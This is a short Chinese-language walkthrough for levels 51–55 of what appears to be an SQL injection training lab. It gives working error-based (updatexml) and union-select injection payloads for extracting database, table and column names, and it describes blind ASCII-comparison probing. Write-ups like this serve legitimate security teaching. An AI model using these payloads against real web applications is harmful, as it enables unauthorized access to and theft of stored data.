第51关

一.查询数据库

1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

二.查表

' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+

 三.查列

' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1)--+ 

第52关

一.查询数据库第一位字符

判断ascii码如下图所示，说明大于114不大于115说明第一个字符为‘s’

同上所述

.........

最终得出数据库为'security' 

二.查数据库中第一张表1的第一个字符

判断ascii码如下图所示，说明大于100不大于101说明第一个字符为‘e‘

 最终得出第一张表为’emails‘

第53关

一.查询数据库第一位字符

判断ascii码如下图所示，说明大于114不大于115说明第一个字符为‘s’

 

同上所述

.........

最终得出数据库为'security' 

二.查security数据库中第一张表的第一位字符

判断ascii码如下图所示，说明大于100不大于101说明第一个字符为‘e‘

 最终得出第一张表为’emails‘

 

第54关

一.查询数据库

http://172.16.1.126/Less-54/?id=-1%27%20union%20select%201,database(),3--+

二.查表

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

 
三.查列

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

 

第55关

一.查询数据库

?id=-1)union select 1,2,database()--+

二.查表

?id=-1)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

 

三.查列

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+